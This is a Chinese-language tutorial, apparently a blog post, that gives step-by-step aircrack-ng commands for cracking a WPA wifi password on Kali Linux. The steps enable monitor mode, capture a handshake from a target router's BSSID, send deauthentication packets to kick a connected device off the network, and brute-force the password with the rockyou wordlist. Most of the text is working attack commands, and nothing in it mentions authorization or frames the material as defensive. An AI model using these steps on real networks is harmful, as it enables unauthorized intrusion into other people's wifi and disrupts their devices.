无线网络破解 aircrack的使用

  1. 安装Kali Linux到U盘中,很方便。
  2. Kali Linux自带的rockyou字典 /usr/share/wordlists/rockyou.txt.gz。
    使用前先解压:
    gzip -d /usr/share/wordlists/rockyou.txt.gz

  3. 首先断开连接的wifi,命令必须在root权限下执行,不然会有commond not found的报错。
    在终端中执行:airmon-ng

    1. 开启无线网卡的监控模式,wlan0是网卡的名字
      airmon-ng start wlan0
      执行成功之后网卡接口变为wlan0mon;可以使用ifconfig命令查看。
  4. 查看wifi网络
    airodump-ng wlan0mon
    记住要破解wifi的频道号和BSSID。
  5. 抓取握手包
    使用网卡的监听模式抓取周围的无线网络数据包。我们需要的是包含密码的握手包。
    开始抓包:
    airodump-ng -c 6 –bssid C8:3A:35:30:3E:C8 -w ~/ wlan0mon
    参数解释:
    -c 指定频道号
    –bssid 指定路由器bssid
    -w 指定抓取的数据包保存位置
  6. 强制连接到wifi的设备重新连接路由器
    给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。
    aireplay-ng的生效前提是,wifi网络中至少有一个连接的设备。从上图(4)可以看到哪些设备连接到了wifi,STATION就是连接设备的MAC地址,记住一个。
    打开新终端执行:
    aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon
    参数解释:
    -0指定发送反认证包的个数
    -a指定无线路由器BSSID
    -c指定强制断开的设备
    如果成功:
    右上角会提示hand包找到。
  7. 停止监听模式。
    airmon-ng stop wlan0mon
  8. 跑字典开始解密码
    aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap
    参数解释:
    -a2代表WPA的握手包
    -b指定要破解的wifi BSSID。
    -w指定字典文件
    最后是抓取的包

你可能感兴趣的:(计算机安全)